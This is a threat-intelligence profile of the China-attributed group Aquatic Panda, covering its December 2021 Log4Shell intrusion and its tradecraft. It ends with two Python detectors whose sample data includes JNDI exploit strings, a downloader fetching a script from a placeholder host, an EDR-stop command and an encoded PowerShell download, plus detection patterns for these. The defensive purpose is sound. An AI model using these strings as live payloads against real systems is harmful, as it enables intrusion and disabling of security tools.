Aquatic Panda is a People's Republic of China state-sponsored cyber-espionage cluster, publicly active since May 2020 and tracked under CrowdStrike's canonical naming, following CrowdStrike's "Panda" nomenclature for China-attributed actors. It is one of the more recently publicly tracked China-attributed APT clusters in modern cyber-threat-intelligence reporting and is distinctive for two features of its operational pattern:

(1) A dual-mission pattern (intelligence collection plus industrial espionage) that distinguishes Aquatic Panda from competing China-attributed clusters whose missions are limited to intelligence collection.
(2) The strongest publicly documented Log4Shell exploitation tradecraft among publicly attributed China-tracked APT clusters, established by the canonical CrowdStrike Falcon OverWatch disclosure of December 2021 describing the cluster's exploitation of Log4Shell against an academic institution.

The December 2021 Log4Shell campaign against an academic institution is what brought the cluster to high visibility in threat-intelligence reporting. The OverWatch disclosure documented exploitation of the Apache Log4j Log4Shell vulnerability (CVE-2021-44228) against a vulnerable VMware Horizon Tomcat web server instance using the Log4j library at an unnamed "large academic institution." The exploitation chain included:

(a) use of a modified version of the Log4Shell exploit (published on GitHub on December 13, 2021) targeted at the VMware Horizon instance;
(b) multiple connectivity-check DNS lookups from the compromised host for a subdomain under the publicly accessible DNS-logging service dns[.]1433[.]eu[.]org, a way of confirming that the Log4Shell exploit had achieved code execution before follow-on tooling was deployed;
(c) execution of a series of Linux commands, including an attempt to establish an interactive bash shell to a hardcoded IP address, plus curl and wget commands to retrieve threat-actor tooling hosted on remote infrastructure;
(d) an attempt to terminate a third-party endpoint detection and response (EDR) service running on the compromised host, a signature behaviour that is consistent across the cluster's observed tradecraft;
(e) download and execution of a Base64-encoded PowerShell command that retrieved malware and three files with the VBS extension from remote infrastructure; the VBS files were loaded into memory as reverse-shell payloads giving the operators interactive access.

CrowdStrike Intelligence linked the operation's infrastructure to the Aquatic Panda cluster and disrupted the intrusion before the cluster could achieve its full intelligence-collection objectives.

The campaign was significant beyond the specific intrusion because it was one of the earliest publicly documented APT-tier Log4Shell exploitation operations across the broader Log4Shell exploitation landscape. It established that Log4Shell was being actively exploited not only by financially motivated organized cybercrime (Conti was the first publicly documented ransomware operation to adopt Log4Shell weaponization, on December 20, 2021) but also by state-aligned APT clusters in support of intelligence-collection objectives. The real-time detection-and-response pattern by which OverWatch produced the disclosure also demonstrated the analytical value of detailed threat-actor tradecraft documentation captured during an active intrusion.

Signature operational tradecraft includes:

(1) N-DAY VULNERABILITY EXPLOITATION OF INTERNET-FACING SERVICES. The cluster's signature initial-access vector is rapid N-day exploitation of newly disclosed vulnerabilities in internet-facing applications and services. The December 2021 Log4Shell exploitation, within approximately one week of the public disclosure of CVE-2021-44228 on December 10, 2021, demonstrates the cluster's rapid N-day acquisition and weaponization capability.
The reliance on N-day rather than zero-day exploitation is consistent with the cluster's positioning as state-aligned but without state-sponsored elite zero-day access, in line with the broader Chinese state-aligned APT ecosystem in which only a subset of clusters (e.g., APT41 / Wicked Panda, Volt Typhoon, and Silk Typhoon under certain naming schemes) maintain zero-day acquisition capability.

(2) PUBLIC DNS-LOGGING-SERVICE ABUSE FOR EXPLOIT-SUCCESS DETECTION. The cluster abuses publicly accessible DNS-logging services (dns[.]1433[.]eu[.]org in the December 2021 campaign) to learn when a remote-code-execution exploit has achieved code execution on a victim host. Because the lookups go to a legitimate public service, the technique evades network-detection signatures that key on DNS queries to attacker-controlled infrastructure. The technique is also observed across multiple other threat-actor clusters (industry analysis notes it is used opportunistically by many actors rather than being exclusive to Aquatic Panda), but it is a signature element of the documented December 2021 academic-institution campaign.

(3) ATTEMPTED EDR TERMINATION POST-COMPROMISE. The cluster attempts to terminate third-party endpoint detection and response (EDR) services running on compromised hosts as a signature defense-evasion technique. The pattern is consistent with the broader anti-EDR tradecraft observed across multiple China-attributed APT clusters, including APT41 / Wicked Panda and others.

(4) MULTI-STAGE PAYLOAD DELIVERY VIA PUBLIC-INFRASTRUCTURE-HOSTED TOOLING. Following initial compromise the cluster retrieves tooling from remote infrastructure via curl, wget, or PowerShell commands, separating the initial-access exploitation payload from the operational tooling so that tooling can be updated rapidly without redeploying the exploitation payload.

(5) IN-MEMORY VBS REVERSE-SHELL DEPLOYMENT. In the December 2021 campaign three files with the VBS extension were loaded into memory as reverse-shell payloads, consistent with the cluster's preference for in-memory execution to evade file-based endpoint-detection-and-response signatures.

(6) COBALT STRIKE BEACON AS PRIMARY POST-COMPROMISE FRAMEWORK. Industry analysis and CrowdStrike Intelligence tracking consistently observe Cobalt Strike Beacon as the cluster's primary post-compromise command-and-control framework, consistent with broader China-attributed APT tooling patterns and with the wider cyber-threat-intelligence observation that Cobalt Strike Beacon is among the most commonly used post-compromise frameworks across both organized cybercrime and state-aligned operations.

(7) DUAL-MISSION OPERATIONAL TARGETING PROFILE. The cluster's dual mission of (a) intelligence collection across the telecommunications, technology and government sectors and (b) industrial espionage against technology-sector organizations distinguishes it from competing China-attributed clusters focused on intelligence collection alone. Industrial-espionage objectives include intellectual property exfiltration, research-and-development data collection, and competitive-intelligence collection supporting Chinese state-aligned technology-sector industrial-policy priorities. The dual-mission pattern aligns with broader Chinese state-aligned priorities under which technology-sector industrial espionage and intelligence-collection operations are coordinated under the same state-aligned umbrella.

Targeted sectors across the cluster's operational history include telecommunications (the signature primary sector), technology and IT services, government administration, defense and military, academic and research institutions, higher-education universities, aerospace, critical infrastructure, semiconductor and chip design, software development, cloud service providers, and virtualization platform vendors (consistent with the December 2021 VMware Horizon targeting). Targeted geographies include the United States (the signature primary geography, including the December 2021 academic-institution target), the United Kingdom, Canada, Australia and New Zealand (Five Eyes-aligned), Germany, France, Japan, South Korea, Taiwan, and the broader Western and Five Eyes-aligned economies.

The cluster is significant as one of the China-attributed APT clusters with the strongest publicly documented Log4Shell exploitation tradecraft, and for the dual-mission pattern that distinguishes Aquatic Panda from competing clusters in the broader Chinese state-aligned APT ecosystem.
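The exploitation chain above, steps (a) and (b) in particular, leaves two correlatable traces on the defender's side: a JNDI lookup string in the web server's request logs and, shortly afterwards, a DNS query from the same host to the public DNS-logging service. The following detector is an added example (not code from CrowdStrike or from this corpus) that runs over constructed Tomcat-style access log lines and DNS query lines; the host names, timestamps and the 198.51.100.7 address are placeholders, and the only real indicator is the DNS-logging domain the report names.

```python
import re
from collections import defaultdict

# Constructed sample data (not from the CrowdStrike report): a Tomcat-style
# access log whose last quoted field is the User-Agent, and a DNS query log.
ACCESS_LOG = """\
10.0.0.5 horizon-01 2021-12-17T10:01:02Z "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.9 horizon-01 2021-12-17T10:01:09Z "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 horizon-02 2021-12-17T10:02:11Z "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:rmi://198.51.100.7/b}"
10.0.0.3 horizon-03 2021-12-17T10:03:00Z "GET /css/a.css HTTP/1.1" 200 "curl/7.68.0"
"""
DNS_LOG = """\
2021-12-17T10:01:12Z horizon-01 A abc123.dns.1433.eu.org
2021-12-17T10:02:14Z horizon-02 A zz9.dns.1433.eu.org
2021-12-17T10:05:00Z horizon-03 A updates.example.com
"""
# The public DNS-logging service named in the report (given there defanged as
# dns[.]1433[.]eu[.]org); add whatever other such services appear in your logs.
DNS_LOGGING_SUFFIXES = ("dns.1433.eu.org",)

LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")   # ${lower:j} -> j
DEFAULT_RE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")           # ${::-j}   -> j

def normalize(s: str) -> str:
    """Collapse nested Log4j lookups used to obfuscate the jndi keyword."""
    prev = None
    while prev != s:
        prev = s
        s = LOOKUP_RE.sub(lambda m: m.group(1), s)
        s = DEFAULT_RE.sub(r"\1", s)
    return s.lower()

def has_jndi(field: str) -> bool:
    return "${jndi:" in normalize(field)

def correlate(access_log: str, dns_log: str) -> dict:
    """Hosts that received a JNDI string and then resolved a DNS-logging name."""
    hits = defaultdict(lambda: {"jndi": 0, "dns_callback": 0})
    for line in access_log.splitlines():
        host = line.split()[1]
        user_agent = line.rsplit('"', 2)[1]       # text of the final quoted field
        if has_jndi(user_agent):
            hits[host]["jndi"] += 1
    for line in dns_log.splitlines():
        _, host, _, qname = line.split()
        if qname.endswith(DNS_LOGGING_SUFFIXES):
            hits[host]["dns_callback"] += 1
    # Both signals on one host: the exploit string landed and code executed
    return {h: v for h, v in hits.items() if v["jndi"] and v["dns_callback"]}
```

The JNDI check alone is noisy because scanners spray lookup strings at every host; the DNS callback is what turns a possible attempt into a confirmed execution.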
In this curated corpus the cluster fills the cell for a modern China-attributed cluster with documented signature Log4Shell exploitation tradecraft, complementing the corpus's broader China-attributed APT coverage of approximately 30+ clusters (apt1, apt3, apt10, apt17, apt31, apt40, apt41, aoqin_dragon, blacktech, cloud_atlas, daggerfly, dark_pink, earth_lusca, emissary_panda, flax_typhoon, gallium, goblin_panda_1937cn, icefog, ke3chang, mirrorface, mustang_panda, naikon, redfoxtrot, redhotel, salt_typhoon, sea_turtle, silk_typhoon, tick_bronze_butler, toddycat, tonto_team, tropic_trooper, volt_typhoon).
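Tradecraft items (3), (4) and (5) above, and steps (c) through (e) of the December 2021 chain, are all visible in process-start telemetry: a shell or downloader spawned by the web-server process, a service-control command naming the EDR agent, and a Base64-encoded PowerShell command that fetches a payload. The triage below is an added example (not code from CrowdStrike or from this corpus) run over constructed events; the host names, the 203.0.113.5 address and the EDR service names are placeholders.

```python
import base64
import re

# Constructed process-start telemetry (not from the report). 203.0.113.5 is a
# documentation-range placeholder; the EDR service names are placeholders too.
ENCODED = base64.b64encode(
    "Invoke-WebRequest http://203.0.113.5/s1.vbs -OutFile C:\\Temp\\s1.vbs".encode("utf-16le")
).decode()
EVENTS = [
    {"host": "horizon-01", "parent": "java", "image": "bash", "cmd": "bash -i"},
    {"host": "horizon-01", "parent": "bash", "image": "curl", "cmd": "curl -O http://203.0.113.5/t.sh"},
    {"host": "horizon-01", "parent": "bash", "image": "systemctl", "cmd": "systemctl stop edr-sensor"},
    {"host": "horizon-02", "parent": "java", "image": "powershell", "cmd": f"powershell -EncodedCommand {ENCODED}"},
    {"host": "horizon-03", "parent": "systemd", "image": "curl", "cmd": "curl https://updates.example.com/x"},
]
WEB_PARENTS = {"java", "tomcat"}                 # the Horizon Tomcat process
DOWNLOADERS = {"curl", "wget", "powershell", "bash", "sh"}
EDR_SERVICES = {"edr-sensor", "epp-agent"}       # placeholders: your EDR's service names
STOP_RE = re.compile(r"\b(?:systemctl\s+stop|p?kill(?:all)?|taskkill|sc\s+stop|Stop-Service)\b", re.I)
ENC_RE = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmd: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, else None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events):
    """Map the report's post-exploitation steps onto simple process-tree rules."""
    findings = []
    for e in events:
        # (c)/(4): shell or downloader spawned directly by the web-server process
        if e["parent"] in WEB_PARENTS and e["image"] in DOWNLOADERS:
            findings.append((e["host"], "web-server-spawned-shell-or-downloader"))
        # (d)/(3): service-control or kill command naming the EDR agent
        if STOP_RE.search(e["cmd"]) and any(s in e["cmd"] for s in EDR_SERVICES):
            findings.append((e["host"], "edr-termination-attempt"))
        # (e)/(5): Base64-encoded PowerShell that fetches a payload or a .vbs file
        decoded = decode_encoded_command(e["cmd"]) if e["image"] == "powershell" else None
        if decoded and re.search(r"Invoke-WebRequest|DownloadFile|\.vbs\b", decoded, re.I):
            findings.append((e["host"], "encoded-powershell-download"))
    return findings
```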